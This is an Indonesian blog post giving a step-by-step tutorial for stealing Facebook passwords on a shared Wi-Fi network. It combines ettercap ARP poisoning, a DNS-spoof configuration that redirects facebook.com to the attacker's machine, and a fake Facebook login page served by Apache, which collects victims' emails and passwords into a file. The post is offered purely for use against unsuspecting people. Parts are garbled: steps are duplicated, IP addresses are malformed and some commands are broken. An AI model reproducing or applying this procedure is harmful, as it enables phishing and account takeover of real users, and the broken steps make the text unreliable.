yang kebiasaan orang dengar sih etercap untuk hack fb orang tap ini lain gan ...
jadi yang saya maksud seperti judul itu sam dengan ettercap . namun pada dasar nya ettercap yang
bisa curi curi curi password facebook itu ,
tapi tehnik ini langsung mencuri password nya dari server / router . kebiasaan orang mencuri password orang dengan tehnik arpspoofing cuman ngelakuinnya 1 persatu dari client yang connect dengan AP router / server nya .
hal yang prlu disiapkan
- persiapan
1 . apache server ( sudo apt-get install apache2)
2 . php (sudo apt-get install php5)
3 . ettercap (sudo apt-get install ettercap)
4 . scribt pishing nya . contoh nya FAKE login facebook '
5 . airkopi segelas dengan snacke
oke next step
sekarang kita akan mencoba untuk mengecek apache2 apakah berjalan . coba aja ketik di browser yang agan gunakan localhost apabila ada tulisan its work . maka apache2 anda berjalan
jadi sekarang kita tinggal
- configure
edit file di /etc/etter.conf
selanjut nya cari barisan ini
#---------------
198.182.196.5 6( ip attacker )
sekrrang chmod file password di var/www supaya bisa di eksikusi
sudo /var/www/touch file password.txt
sudo /var/www/chmod file password.txt
jadi misalkan ip ente 192.168.1.45 maka ubahlah 192.168.195.56 menjadi 192.168.1.45
untuk mengecek ip kita bisa ketik di terminal ifconfig maka akan keluar ip anda
sekarang copykan FAKE login anda ke /var/www/ ,
dan sekarang buka ettercap anda lewat terminal .
sudo ettercap -C -i (interace network)
contoh sudo ettercap -C -i wlan0
dan sekarang keluar dah ettercap nya , lalu pilih di tap sniif > unified sniffing > dan pilih interface anda
selanjutnya ke tab host > scan host dan maka akan keluar ip client yang connect ke AP router nya
kemudian ke tab pluging > manage pluging dan aktifkan autoadd & dns spoof
selanjut nya pilih ke tab mitm dan centang arp poisoning dan terakir ke tab start > plih start sniffing
dan sekrang untuk menghilangkan jejak nya kita harus menyamar sebagai router acces point nya
sudo gedit /proc/sys/net/ipv4/ip_forward ( enter ) masukan pass laptob ente
ganti angka 0 menjadi 1
# Linux
#---------------
# if you use ipchains:
redir_command_on = "ipc198.182.196.5 6hains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j
REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j
REDIRECT --to-port %rport"
jadi hilang kan tanda pagarnya (#) sehinnga menjadi seperti yang dia atas itueee
jangan lupa save
dan sekarang kita harus juga mengedit file di /usr/share/ettercap/etter.dns
microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed
menjadi
facebook.com A 198.182.196.56
*facebook.com.com A 198.182.196.56
www.facebook.com PTR 198.182.196.56 # Wildcards in PTR are not allowed
facebook.com (site yang ingin kita pishing)
198.182.196.5 6( ip attacker )
sekrrang chmod file password di var/www supaya bisa di eksikusi
sudo /var/www/touch file password.txt
sudo /var/www/chmod file password.txt
jadi misalkan ip ente 192.168.1.45 maka ubahlah 192.168.195.56 menjadi 192.168.1.45
untuk mengecek ip kita bisa ketik di terminal ifconfig maka akan keluar ip anda
sekarang copykan FAKE login anda ke /var/www/ ,
- eksikusi
dan sekarang buka ettercap anda lewat terminal .
sudo ettercap -C -i (interace network)
contoh sudo ettercap -C -i wlan0
dan sekarang keluar dah ettercap nya , lalu pilih di tap sniif > unified sniffing > dan pilih interface anda
selanjutnya ke tab host > scan host dan maka akan keluar ip client yang connect ke AP router nya
kemudian ke tab pluging > manage pluging dan aktifkan autoadd & dns spoof
selanjut nya pilih ke tab mitm dan centang arp poisoning dan terakir ke tab start > plih start sniffing
dan sekrang untuk menghilangkan jejak nya kita harus menyamar sebagai router acces point nya
sudo gedit /proc/sys/net/ipv4/ip_forward ( enter ) masukan pass laptob ente
ganti angka 0 menjadi 1
- selesai
dan sekarang tinggal tunggu ajja . . . .
tunnggu barang 10 menitan ane jamin sih facebook client udah ada sama kita
jadi password and email nya terletak di /var/www/
disitulah file nya . jadi buka file yang ber eksikusi passwordnya
okeeeee dah
Tidak ada komentar:
Posting Komentar